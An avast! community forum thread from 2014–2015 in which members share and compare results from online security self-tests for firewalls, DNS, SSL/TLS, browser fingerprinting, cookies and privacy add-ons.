(http://www.screencast-o-matic.com/screenshots/u/Lh/1388617483153-13856.png)
Title: Re: Tests and other Media topics
Post by: polonus on January 03, 2014, 01:12:51 PM
Thank you, bob3160, for testing this. Had similar results  ;D

Damian
Title: Re: Tests and other Media topics
Post by: Para-Noid on January 03, 2014, 11:46:29 PM
A check and secure test, do it here ->  http://www.check-and-secure.com/portcheck/_en/index.html

enjoy,

polonus

I have used the grc.com "shieldsup" test.
Each of them showed no holes.
I use the port stealthing in Comodo Firewall.  8)

Title: Re: Tests and other Media topics
Post by: polonus on January 03, 2014, 11:55:51 PM
Hi Para-Noid,

I could not think of Para-Noid other than being "completely stealth". And so he is.
Thanks for the feedback, my good friend,

pol
Title: Re: Tests and other Media topics
Post by: polonus on January 08, 2014, 11:49:44 PM
My router survived the crash test. Yours also? Time to celebrate or weep... ;D
Take the test: https://www.grc.com/dns/crashtest.htm  (courtesy of GRC- thank you Steve!)

polonus
Title: Re: Tests and other Media topics
Post by: Simion on January 09, 2014, 12:22:51 AM
Mine, too!  ;D
Title: Re: Tests and other Media topics
Post by: marc-d-l on January 09, 2014, 12:58:55 AM
Mine survived yet another test (cheer)
Title: Re: Tests and other Media topics
Post by: polonus on January 13, 2014, 05:58:46 PM
Test that site-uri before you click through to venture out somewhere for the first time.
I won't go places without pre-scanning the URL.

Some URL pre-scanning possibilities are given below.
Go to: http://www.google.com/safebrowsing/diagnostic?site=
example http://www.google.com/safebrowsing/diagnostic?site=http://lfmonline.de/test/test.php
or http://scanurl.net/?u=   (a nice metascanner)
or http://online.us.drweb.com/?url=1
or http://soswebscan.jobandproject.com/beta_scan.php
or http://www.websicherheit.at/en/website-security-check/

Whenever avast! shields block you from going there or Google Safebrowsing or Bitdefender TrafficLight stay away!
When in doubt post in the virus and worms section for a sec op and help from a qualified removal expert.

Do not act like those in the attached picture, play safe, stay secure!

polonus
Title: Re: Tests and other Media topics
Post by: Simion on January 13, 2014, 11:30:49 PM
Hi Damien,

I'm getting a 400 error on the first one.
Title: Re: Tests and other Media topics
Post by: polonus on January 13, 2014, 11:37:59 PM
Well the 400 error won't come when you give in a site name to follow that, like for instance:
-> http://www.google.com/safebrowsing/diagnostic?site=http://en.wikipedia.org/wiki/Kinloch_Rannoch
So you need to add the site to scan to the query!

pol
Title: Re: Tests and other Media topics
Post by: Simion on January 13, 2014, 11:40:48 PM
Doh! I'm an idiot. I was trying to bookmark it. ;D

Thanks
Title: Re: Tests and other Media topics
Post by: !Donovan on January 14, 2014, 02:39:09 AM
Hi,

It is possible to use JavaScript in your bookmark so that clicking the bookmark will show you the Google SafeBrowsing results for the current site you're on.

Cheers,
~!Donovan
Title: Re: Tests and other Media topics
Post by: polonus on January 31, 2014, 06:12:14 PM
Test how modern your browser is: http://modernizr.github.io/Modernizr/test/index.html
Here are my results: Tests completed in 758 milliseconds.
836 tests of 836 passed, 0 failed.

OK Google Chrome - very modern!

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 31, 2014, 06:21:11 PM
Generate some bogus data for the snoopers: http://www.generatedata.com/  (demo)

Enjoy,

polonus


Title: Re: Tests and other Media topics
Post by: marc-d-l on January 31, 2014, 08:19:20 PM
Tests completed in 174 milliseconds.
823 tests of 823 passed, 0 failed.

Firefox 26.0
Title: Re: Tests and other Media topics
Post by: DavidR on January 31, 2014, 09:18:28 PM
Tests completed in 174 milliseconds.
823 tests of 823 passed, 0 failed.

Firefox 26.0

He He, I always fail these because they can't run (JavaScript blocked), NoScript and RequestPolicy add-ons.
Title: Re: Tests and other Media topics
Post by: polonus on January 31, 2014, 11:23:54 PM
Hi DavidR,

That is what we call a very secure "fail",  ;D

pol

Title: Re: Tests and other Media topics
Post by: polonus on February 07, 2014, 11:57:22 PM
Remote Access Test, so test whether your wifi modem is accessible from the Internet: https://www.xs4all.nl/klant/veiligheid/telefoniemisbruik/?port=3000&submitfritz=Test+mijn+Fritzmodem  The custum port for abuse is 443
Mine is not remotely accessible - remote access is off.

polonus

Title: Re: Tests and other Media topics
Post by: polonus on February 08, 2014, 12:19:19 AM
Is this Israeli starter av solution an absolute av-panacea for now and the future?
All malcode is basically re-inventive and evolutionary, so all new malware comes as some "new wine in old skins".
Read on this revolutionary concept here: http://www.cyactive.com/
Re: http://www.timesofisrael.com/hack-this-start-up-claims-it-can-stop-all-viruses-permanently/  article author = David Shamah

pol
Title: Re: Tests and other Media topics
Post by: polonus on February 11, 2014, 03:17:34 PM
Cookies and security report. Do a scan!
Example: http://webcookies.info/cookies/forum.avast.com/1126549/
6 persistent cookies found, no third party domains and that is good!

pol
Title: Re: Tests and other Media topics
Post by: CraigB on February 11, 2014, 03:31:41 PM
Cookies and security report. Do a scan!

6 persistent cookies found, no third party domains and that is good!
Same score for me with 12 avast session cookies :)
Title: Re: Tests and other Media topics
Post by: Para-Noid on February 11, 2014, 04:19:37 PM
Cookies and security report. Do a scan!

6 persistent cookies found, no third party domains and that is good!
Same score for me with 12 avast session cookies :)

+3  8)
Title: Re: Tests and other Media topics
Post by: bob3160 on February 11, 2014, 04:39:29 PM
(http://www.screencast-o-matic.com/screenshots/u/Lh/1392133147521-1743.png)
Title: Re: Tests and other Media topics
Post by: polonus on February 13, 2014, 12:57:52 AM
Right O, bob3160,

Let us now check whether we can reach our IP6 address: http://myip6.com/
Access via CloudFlare Ray ID at https://www.cloudflare.com

polonus

Title: Re: Tests and other Media topics
Post by: bob3160 on February 13, 2014, 02:21:24 AM
Right O, bob3160,

Let us now check whether we can reach our IP6 address: http://myip6.com/ (http://myip6.com/)
Access via CloudFlare Ray ID at https://www.cloudflare.com (https://www.cloudflare.com)

polonus
(http://www.screencast-o-matic.com/screenshots/u/Lh/1392254346435-84175.png)
Apparently the avast! SecureLine does an excellent job since it has me totally where I'm not :)
Title: Re: Tests and other Media topics
Post by: polonus on February 19, 2014, 06:47:31 PM
Hackers and attackers start with reconnaissance test(s).
Do a zone transfer test
Let us see if they could succeed to perform a zone transfer: http://hackertarget.com/zone-transfer/
I have got: no results found  ;D ; (1 server found)
;; global options: +cmd
; Transfer failed.

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on February 19, 2014, 07:42:32 PM
Same results for me. :)
Title: Re: Tests and other Media topics
Post by: polonus on February 22, 2014, 11:36:05 PM
Do the test.
What is my referer? here: http://www.whatismyreferer.com/
My outcome: No referer / Hidden    You're one step further on your way to anonymity on the internet!
And test here: http://darklaunch.com/tools/test-referer
Link with rel="noreferrer" -> no referrer was sent!
Link -> no referrer was sent!
Form via POST and GET was sent.
Also configure per site with RefControl see: http://www.stardrifter.org/refcontrol/

Here they also say I have no referer (header response) http://www.zeigen.com/refer/

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 22, 2014, 11:45:48 PM
About the security implications of the above tests: https://isc.sans.edu/forums/diary/When+does+your+browser+send+a+Referer+header+or+not+/16433
link article author Johannes B. Ullrich, Ph. D.
Mind you that firefox has a different referer policy opposed to Google Chrome.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 24, 2014, 03:10:48 PM
Is your server up? Test here:  www.serverstatus.nl/status.php

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 25, 2014, 04:23:35 PM
Test your browser here: https://www.ssllabs.com/ssltest/viewMyClient.html  This is a SSL Client test.

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on February 25, 2014, 04:45:09 PM
Test your browser here: https://www.ssllabs.com/ssltest/viewMyClient.html (https://www.ssllabs.com/ssltest/viewMyClient.html)  This is a SSL Client test.

polonus
"Chrome and Firefox are not vulnerable, even when running on a vulnerable operating system."
Title: Re: Tests and other Media topics
Post by: polonus on March 09, 2014, 02:57:34 AM
Is your firewall working and stealth, tetst here: http://www.shieldcheck.com/firewall_test/
Mine is working and stealth is good, all green.
Drag this link to your browser's toolbar to check occasionally: http://www.shieldcheck.com/auto/

enjoy,

pol
Title: Re: Tests and other Media topics
Post by: bob3160 on March 09, 2014, 03:07:45 PM
(http://www.screencast-o-matic.com/screenshots/u/Lh/1394374022194-67515.png)
Nothing special, just the firewall that's part of Windows 8.1 :)
Title: Re: Tests and other Media topics
Post by: polonus on March 11, 2014, 11:20:29 PM
Want to know about the technologies a site was built with, scan here, example: http://builtwith.com/aspentheseries.com
One could sign up for free and see the technolgical history of a site.
Your HTTP analyzer and debugger could be Fetch: http://fetch.scritch.org/bookmarklet/?u=

enjoy my good forum friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 13, 2014, 04:54:38 PM
Hi a nice link to test how fast a webpage will load (also in Polish): http://test.watchscript.com/?lang=en
Total loading time of this forum site was 11.157 seconds.
Also nice for scanning defaced sites.

Or use Mill Test Reports from here: https://www.websitepulse.com/help/testtools.mtr-test.html
Other free tools there also.

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 02, 2014, 07:28:14 PM
Do a resolver check here: http://www.openresolver.nl/ 
Please, give in resolver ip or hostname
No reaction from server is green and OK.

pol

P.S. Another one on a slightly different footing:
http://www.thinkbroadband.com/tools/dnscheck.html

D

Title: Re: Tests and other Media topics
Post by: AdrianH on April 02, 2014, 07:42:47 PM
The Anti-Malware Testing Standards Organization (AMTSO TM )

Test your Anti-Malware Settings here..  http://www.amtso.org/

Title: Re: Tests and other Media topics
Post by: polonus on April 02, 2014, 07:51:50 PM
The PUP download is thwarted by my Google Chrome browser.
Avast blocks the access of htxp://www.amtso.org/uploads/cloudcar.exe

So I am good to go,

pol
Title: Re: Tests and other Media topics
Post by: Para-Noid on April 02, 2014, 10:41:47 PM
The Anti-Malware Testing Standards Organization (AMTSO TM )

Test your Anti-Malware Settings here..  http://www.amtso.org/

This test has been around for a while. It was in a post from over a year ago, if I remember right.
But, it's great to see it pop-up every now and then.  8)
Title: Re: Tests and other Media topics
Post by: polonus on April 02, 2014, 10:57:17 PM
Hi Para-Noid,

For some it will be new, so thanks to AdrianH to remind us (again),

polonus
Title: Re: Tests and other Media topics
Post by: Para-Noid on April 02, 2014, 11:26:08 PM
+1  8)

Like I said it's great to see it pop-up now and then. 
It's a fantastic set of tests.  :)
Title: Re: Tests and other Media topics
Post by: polonus on April 12, 2014, 04:40:25 PM
Do this test: https://browsercheck.qualys.com/?scan_type=js
My results were:
Congratulations! You passed Qualys BrowserCheck.
We recommend you scan your browser regularly to stay up to date with the latest versions and plugins.
And yours?

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 13, 2014, 02:40:19 AM
Check your SSL client, is it OK?
Test here: https://www.howsmyssl.com/

pol
Title: Re: Tests and other Media topics
Post by: polonus on April 13, 2014, 07:13:27 PM
Test SSL domains for Heartbleed: https://www.ssllabs.com/ssltest/

pol
Title: Re: Tests and other Media topics
Post by: polonus on April 19, 2014, 05:57:49 PM
Test whether your router could be turned into a zombie proxie to be used in amplification attacks through this test:
http://www.openresolver.nl/
I get a no reaction, so that is OK.

Or test here: http://openresolver.com/?ip=
You should get Recursive resolver is not detected on (ip address)
IP address (so and so) is not vulnerable to DNS Amplification attacks.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 20, 2014, 04:12:25 PM
Do a SSL configuration test here: https://sslcheck.x509labs.com/nl/sslcheck?host=
First choose your location, then proceed.

pol
Title: Re: Tests and other Media topics
Post by: polonus on May 07, 2014, 12:30:00 AM
Check and secure your browser plug-ins: http://www.check-and-secure.com/browsercheck/_en/
I mean just the first informational part,
not the supposed hardening or the proposed non-avast scanners and cleaners mentioned on that page.
This plug-in and find was a surprise yo me: http://techdows.com/2012/08/is-it-possible-to-remove-chrome-remote-desktop-viewer-plugin-from-chrome.html

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 09, 2014, 10:53:11 PM
Do the JonDonym full anonymity  test: http://ip-check.info/?lang=en

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 09, 2014, 11:36:53 PM
NoScript and Request Policy in Firefox can help get better results.

polonus

P.S. There is another way to go quite quite stealth in firefox with SecretAgent add-on: https://www.dephormation.org.uk/index.php?page=81
What Secret Agent Does... -> https://addons.mozilla.org/en-US/firefox/user/SecretAgent/
With every web request (or page load, or browser session), Secret Agent does the following things;
Compares the web site host to a white list
If the host isn't on the white list,
Request Headers;
Overrides your browser's 'User Agent' with a random alternative selected from a customizable list
Overrides your browser's 'Accept' header with a random alternative selected from a customizable list
Javascript;
Overrides your brower's Javascript navigator.oscpu value using a random alternative selected from a customizable list
Proxy Headers;
Sets an HTTP X-Forwarded-For header with a random IP address
Sets an HTTP Via header with a random IP address
Cache Headers;
Sets a spoof ETag header with a random string of characters
If the optional 'If-Modified-Since' spoofing feature is enabled, overrides incoming 'Last-Modified' headers with a random time offset
If the host is on the white list
Request Headers;
Presents your browser's default 'User Agent' (or overrides with a user configurable value)
Presents your browser's default 'Accept' header (or overrides with a user configurable value)
Javascript;
Presents your browser's default Javascript naivator.oscpu value (or overrides with a user configurable value)
Proxy Headers;
Unaffected
Cache Headers;
Unaffected
N.B.
Mind you to whitelist the pages you want to use, because in stealth mode you are no longer being able for instance to post in the forums,
in that case disable the add-on or whitelist forum dot avast dot com in the extension.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 10, 2014, 12:01:12 AM
I checked with Panopticlick and indeed these results changed per request:
user agent one time like xxxxxx Gecko, next time it was xxxxx Galeon 1.3.21
HTTP accept headers also changed text/etc   and  next time application/application/
No Plug-in details, No time-zone, No Screen Size, No System fonts, just cookies enabled (first domain)
Limited supercookie test failed. Just have to test the webshields with this in action.
I tested it out and yes WebShield is normally detecting in a SecretAgent's Stealth mode enabled browser.
Read a review here: http://www.wilderssecurity.com/threads/firefox-top-security-privacy-extension.329939/page-2
We haveto update secret agents useragent list in the PHP script to be actual.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 10, 2014, 01:23:06 AM
For what it is worth, automatic firewall check: http://www.shieldcheck.com/auto/

For me all green, my firewall is working!

pol
Title: Re: Tests and other Media topics
Post by: TerraX on May 10, 2014, 01:30:39 AM
Hi,

with me everything is green ... i have avast! Firewall. 8) ;)
Thanks for the test page.

TerraX
Title: Re: Tests and other Media topics
Post by: Callender on May 10, 2014, 02:20:09 AM
Another "interesting" Firefox Add On.

User Agent Cleaner.

Warning. Page is in Russian and requires translation: http://fxprivacy.8vs.ru/

Translated: http://translate.google.com/translate?hl=en&sl=ru&tl=en&u=http%3A%2F%2Ffxprivacy.8vs.ru%2F

Note: A better bet is to visit this page using Firefox: https://addons.mozilla.org/en-US/firefox/addon/http-useragent-cleaner/?src=userprofile

Like SecretAgent it increases privacy and will also prevent logins working on most sites. The add on can be disabled with a single click. It's pretty advanced and I haven't really got to grips with it just yet - particularly with enabling or disabling specific settings on a per site basis.

Title: Re: Tests and other Media topics
Post by: polonus on May 10, 2014, 04:12:55 PM
Hi Callender,

Thanks for your contribution to the discussion. Interesting and will give it a look,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 10, 2014, 04:45:07 PM
Do a proxy test: http://www.lagado.com/proxy-test
and a cache test: http://www.lagado.com/tools/cache-test
Also check your accurate time: http://www.lagado.com/tools/time
you can sync with: http://www.worldtimeserver.com/atomic-clock/atomic.exe  (891 KB)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 11, 2014, 05:54:57 PM
Whenever you installed SecretAgent 1.26 you can renewed check the User Agent Spoofing here: http://whatsmyuseragent.com/
# You!! Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060417
next Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060206 Songbird/0.1
then Mozilla/5.0 (compatible; Konqueror/3.5; Linux; X11; i686; en_US) KHTML/3.5.3 (like Gecko)
then Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7) Gecko/20070606
etc. etc.
With stealth mode active  I get an error going to
http://browserspy.dk/os.php e.g. Fatal error: Multiple access type modifiers are not allowed in /home2/gemal/public_html/inc/gsite.php on line 1788

This check worked fine: https://browsercheck.qualys.com/  and also this one: http://www.healthstream.com/browsercheck/?bhcp=1
retested in stealth mode. Strange that a pop-up blocker should be disabled: Popup blocking disabled is recommended.

pol
Title: Re: Tests and other Media topics
Post by: polonus on May 12, 2014, 11:27:24 PM
Another Free SSL Web Server Tester: https://www.wormly.com/test_ssl/h/www.security.nl/i/213.156.0.246/p/443
(with an random example search query)
nice to use next to this one for comparison: https://www.ssllabs.com/ssltest/index.html

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 13, 2014, 04:08:23 PM
A commercial site integrity checker:
example: http://www.sitetruth.com/fcgi/ratingdetails.fcgi?url=bufferapp.com&details=true
Scan will produce identifying info data,
also a link going here (example) http://validator.w3.org/check?uri=http%3A%2F%2Fforum.avast.com%2Findex.php%3F

enjoy,

pol
Title: Re: Tests and other Media topics
Post by: polonus on May 15, 2014, 12:01:45 AM
Content Security Policy Test.

Take it here: https://isc.sans.edu/tools/csptest.html?csp=N

test is brought to us by Johannes Ullrich

polonus

In Google Chrome all four pop-up alerts were neatly blocked by CSP.
Title: Re: Tests and other Media topics
Post by: polonus on May 15, 2014, 12:47:22 AM
Now test your browsers adblocker: http://ads-blocker.com/testing

and top it off with this one: http://thepcspy.com/blockadblock/

and a completely other one: http://pseudo-flaw.net/content/adblock/  (checking to circumvent an adblocker - they are anti-adblocking and firefox)

pol
Title: Re: Tests and other Media topics
Post by: polonus on May 23, 2014, 12:14:50 AM
Please, avast! friends, test your browser with Device Fingerprint here: http://noc.to/

Great tools, great info...what information my/your  browser is leaking to websites, be aware.
Every user of Ghostery will like like this site.

Damian

Title: Re: Tests and other Media topics - Etag Tracking Test
Post by: REDACTED on June 14, 2014, 09:59:16 PM
Etag Tracking - apparently not a method used or detected by Panopticlick.

 I've also known about tracking users via the use of Etags for some time now and when using any browser I tend to try to find ways to stop this from happening. That's not because it's a huge concern but just because if it's possible to block it then I see no disadvantage.

I found a site that can be used to test if your browser is trackable via the Etag method.

https://ochronus.com/tracking-without-cookies/

 There's some interesting info. With Etags blocked in my browser each visit or page refresh results in the site visit counter remaining at 1.

 If I unblock Etags it records each subsequent visit.
Title: Re: Tests and other Media topics
Post by: polonus on June 18, 2014, 01:54:02 AM
Time to test your pop-up blocking here: http://www.popuptest.com/
Coutesy of WebAttack

pol
Title: Re: Tests and other Media topics
Post by: polonus on June 19, 2014, 10:38:51 PM
Are you aware you should always use strong enough passwords?
Would you use a site like these given below or you 'd rather not..
Test here: https://howsecureismypassword.net/
or here: https://www.grc.com/haystack.htm
Hopefully these sites aren't https-stripped, read about this threat here:
http://blog.zimperium.com/linkedin-0day-vulnerability-puts-your-data-at-risk/
link article authors: zteam

pol
Title: Re: Tests and other Media topics
Post by: MikeBCda on June 19, 2014, 11:38:02 PM
Please, avast! friends, test your browser with Device Fingerprint here: http://noc.to/

Great tools, great info...what information my/your  browser is leaking to websites, be aware.
Every user of Ghostery will like like this site.

Damian
Mostly accurate, but some of their info is way out of date.  They show my ISP provider as Golden Triangle, which was bought out by Execulink something like 5 or 6 years ago ... the "Golden" name hasn't been used since then with one exception:  they retained the golden.net domain strictly for email, so users wouldn't have to change their addys.
(Edit) Was all but that first bit from me one sentence?? Sorry about that.  :-[
Title: Re: Tests and other Media topics
Post by: polonus on June 20, 2014, 06:28:35 PM
Hi MikeBCda,

Well the geolocation coordinates are precise and that means they can very precisely pinpoint your wifi router connection or your smartphone location etc.. Without the geo-location active they cannot get further than the ISP access point wherever that may be. Nevertheless your tranparency is growing the better and more refined device fingerprinting becomes.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 27, 2014, 12:33:51 PM
Check your IP space for Open Resolver Threat: http://openresolverproject.org/search2.cgi?botnet=yessir&search_for=  (give in your IP)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 29, 2014, 04:49:28 PM
See: http://www.nlnetlabs.nl/projects/dnssec-trigger/
Dnssec-trigger reconfigures the local unbound DNS server. This unbound DNS server performs DNSSEC validation, but dnssec-trigger will signal it to to use the DHCP obtained forwarders if possible, and fallback to doing its own AUTH queries if that fails, and if that fails prompt the user via dnssec-trigger-applet the option to go with insecure DNS only.

This software is experimental at this time.
Info & link credits and go to "Erwtensoep".

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 04, 2014, 12:39:00 AM
Learn more about your browser here: http://www.browserleaks.com/flash

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 07, 2014, 05:26:36 PM
For those who want to know: https://www.eff.org/https-everywhere/atlas/index.html
Example: https://www.eff.org/https-everywhere/atlas/domains/avast.com.html

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 14, 2014, 12:08:10 PM
Perform this drive-by-download check: http://www.amtso.org/feature-settings-check-drive-by-download.html

polonus
Title: Re: Tests and other Media topics
Post by: Asyn on August 14, 2014, 12:36:01 PM
Perform this drive-by-download check: http://www.amtso.org/feature-settings-check-drive-by-download.html

polonus
Why..!? We're covered. :)
Title: Re: Tests and other Media topics
Post by: polonus on August 28, 2014, 04:19:37 PM
OK problems with your domain, check using Domain Doctor.
An example: https://manage.centralnic.com/support/domain_doctor/superfactura.com.ar

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 07, 2014, 02:17:52 PM
Test here is free: https://www.wormly.com/test_ssl
and here: https://www.ssllabs.com/ssltest/

(Mind you result data cannot be used online as you cannot use these specific information against any online entity, while this is/may not be allowed under the present residing law of certain countries without explicit previously given written consent or just for non-public educational and research purposes which should not be revealed)

Why scan? Well, read here:
https://community.rapid7.com/community/infosec/sonar/blog/2014/09/04/107000-web-sites-no-longer-trusted-by-mozilla

Also test your client security here: https://www.howsmyssl.com/  (mine is OK)
Quote
TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256
TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
TLS_ECDHE_RSA_WITH_RC4_128_SHA
TLS_DHE_RSA_WITH_AES_128_CBC_SHA
TLS_DHE_DSS_WITH_AES_128_CBC_SHA
TLS_DHE_RSA_WITH_AES_256_CBC_SHA
TLS_RSA_WITH_AES_128_GCM_SHA256
TLS_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_AES_256_CBC_SHA
TLS_RSA_WITH_3DES_EDE_CBC_SHA
TLS_RSA_WITH_RC4_128_SHA
TLS_RSA_WITH_RC4_128_MD5

enjoy, my friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 07, 2014, 02:44:35 PM
Here is where you can also check for weak keys (blacklisted): http://certlogik.com/ssl-checker/
Example: -http://certlogik.com/ssl-checker/forum.avast.com/summary

pol
Title: Re: Tests and other Media topics
Post by: polonus on September 08, 2014, 01:24:38 PM
Can this free tool be used next to avast! ?

https://www.gdata.nl/nl-usb-keyboard-guard

Protects a PC against manipulated pendrives/USB-sticks.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 16, 2014, 01:03:36 PM
Has your site or mail been compromised or are you one of the lucky ones?
Test here: https://haveibeenpwned.com/PwnedWebsites
https://haveibeenpwned.com/DomainSearch
and https://pwnedlist.com/query

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 26, 2014, 11:10:02 PM
Cookiechecker says avast forum site is OK: http://www.cookiechecker.nl/check-cookies.php?url=https://forum.avast.com/index.php
Refreshed here: http://www.cookiechecker.nl/check-cookies.php?url=https://forum.avast.com/index.php&cache=false

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 27, 2014, 05:27:30 PM
For website security testers, http security header misery and the consequences.
Test online: https://securityheaders.com/
What is being tested?
Headers We Examine
Access Control Allow Origin
Content Security Policy
Cross Domain Meta Policy
NoSniff
Server Information
Strict Transport Security
UTF-8 Character Encoding
X-Frame-Options
X-Powered-By
X-XSS-Protection

Get going, get aware, get secure!

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 16, 2014, 05:28:50 PM
Test against the SSLv3 Poodle Attack. When you vulnerable you see a poodle, a springfield terrier whenever you are safe!
Go to https://www.poodletest.com/
Firefox Users are advised to install this add-on: https://addons.mozilla.org/en-US/firefox/addon/ssl-version-control/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 28, 2014, 10:47:58 PM
Google All Over The World!
Test: http://best-seo-tools.net/googlecheck/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 09, 2014, 04:39:30 PM
Test the SSL capabilities of your browser here: https://www.ssllabs.com/ssltest/viewMyClient.html

polonus

P.S. Read on backward compatibility: http://tools.ietf.org/html/rfc2246#appendix-E
Title: Re: Tests and other Media topics
Post by: polonus on November 26, 2014, 07:14:36 PM
Hi folks, here is the online tracker tracker: https://tools.digitalmethods.net/beta/trackerTracker/       (credits Maurits Martijn)
Quote
The tool Tracker Tracker uses Ghostery to detect in a set of URLs a predefined set of 'fingerprints' of web technologies, such as social buttons and trackers, and outputs a list of technologies used per URL.

The tool Tracker Tracker can be used to make (some parts of) the 'cloud' visible.
Enjoy, my good forum friend, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 26, 2014, 07:25:32 PM
Results for example, example is raventools.com

url   scheme   host   path   type   query   aid   cid   date   patterns   objects   name   affilition
http://raventools.com   http   raventools.com      analytics      13   81   2014-11-26 19:23:36   google-analytics\.com\/(analytics\.js|urchin\.js|ga_exp\.js|ga\.js|u\/ga_debug\.js|u\/ga_beta\.js|u\/ga\.js|cx\/api\.js|collect) ; google-analytics\.com   http://www.google-analytics.com/analytics.js ; http://www.google-analytics.com/analytics.js   Google Analytics   
http://raventools.com   http   raventools.com      tracker      588   881   2014-11-26 19:23:37   cdn\.optimizely\.com\/js\/ ; optimizely\.com   http://cdn.optimizely.com/js/2185221172.js ; http://cdn.optimizely.com/js/2185221172.js   Optimizely   
http://raventools.com   http   raventools.com      widget      655   1008   2014-11-26 19:23:37   \.olark\.com

pol
Title: Re: Tests and other Media topics
Post by: polonus on November 28, 2014, 12:14:25 AM
Does this actually work? Re: http://www.iconico.com/emailProtector/
Or is obfuscation already hopeless protection to prevent mail spam harvesting?

Anyone to comment?

polonus

P.S. Browser rendered the mail address sooner as one could say the proverbial phrase...
Another hopeless attempt: http://www.cha4mot.com/t_mailto.html

D
Title: Re: Tests and other Media topics
Post by: REDACTED on December 20, 2014, 08:39:27 AM
Does this actually work? Re: http://www.iconico.com/emailProtector/
Or is obfuscation already hopeless protection to prevent mail spam harvesting?

Anyone to comment?

polonus

P.S. Browser rendered the mail address sooner as one could say the proverbial phrase...
Another hopeless attempt: http://www.cha4mot.com/t_mailto.html

D

What I tend to use when I need a way for someone to contact me without revealing my email address:

http://xinbox.com/

If you post the URL (obfuscated in my sreenshot since i don't wish to post it here) then any message gets sent to your email inbox.

You get your own URL - example: h**p://xinbox.com/polonus



Title: Re: Tests and other Media topics
Post by: polonus on January 31, 2015, 04:19:49 PM
Test my DNS: https://www.dns-oarc.net/oarc/services/dnsentropy 
Web-based DNS check all results for me were GREAT
Some other online tests for websites: http://www.dnsinspect.com/
and http://mxtoolbox.com/ and  http://www.dnsqueries.com/en/dns_lookup.php

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 11, 2015, 09:04:07 AM
Nice test site for website developers: http://caniuse.com/
Does your browser support and can you use the technology?

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 12, 2015, 05:30:18 PM
Test your computer IP for rogue-DNS here: https://forms.fbi.gov/check-to-see-if-your-computer-is-using-rogue-DNS#googtrans(en)
My IP is not configured to use malicious DNS-servers.
link with thanks/credits to FBI - USA v. Vladimir TSASTSIN, ET AL.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 22, 2015, 03:45:35 PM
Test for the Superfish Komodia problem on your machine!
Test is here: https://filippo.io/Badfish/

No badfish for me, probably not intercepting my connections!

How are yours?

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on February 22, 2015, 04:12:46 PM
Test for the Superfish Komodia problem on your machine!
Test is here: https://filippo.io/Badfish/ (https://filippo.io/Badfish/)

No badfish for me, probably not intercepting my connections!

How are yours?

polonus
I prefer a good steak. :) No fish on my systems either. :)
Title: Re: Tests and other Media topics
Post by: polonus on February 22, 2015, 04:28:58 PM
Hi bob3160,

Also rather have a good burger than  Komodia's "gefillte fisj"  ;)

Damian
Title: Re: Tests and other Media topics
Post by: polonus on February 22, 2015, 04:57:27 PM
But you should do that test, as others/malcreants can now also intercept Superfish encrypted proxy communications: http://threatpost.com/lenovo-superfish-certificate-password-cracked/111165
Good that Windows Defender removes it.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 22, 2015, 05:18:49 PM
Time to clean the crap and junk from your computer: http://www.pcworld.com/article/2141881/beat-it-bloatware-how-to-clean-the-crap-off-your-pc.html

polonus
Title: Re: Tests and other Media topics
Post by: DavidR on February 22, 2015, 06:11:50 PM
Test for the Superfish Komodia problem on your machine!
Test is here: https://filippo.io/Badfish/

No badfish for me, probably not intercepting my connections!

I generally never bother with these tests as for the most part I have to actually let the test through NoScript and RequestPolicy. But a bigger consideration is that you have to trust the test site and you all know what a trusting sort I am NOT.
Title: Re: Tests and other Media topics
Post by: polonus on February 22, 2015, 10:26:24 PM
The test link appeared on several renowned security forums, so I very much doubt there is something fishy about it.
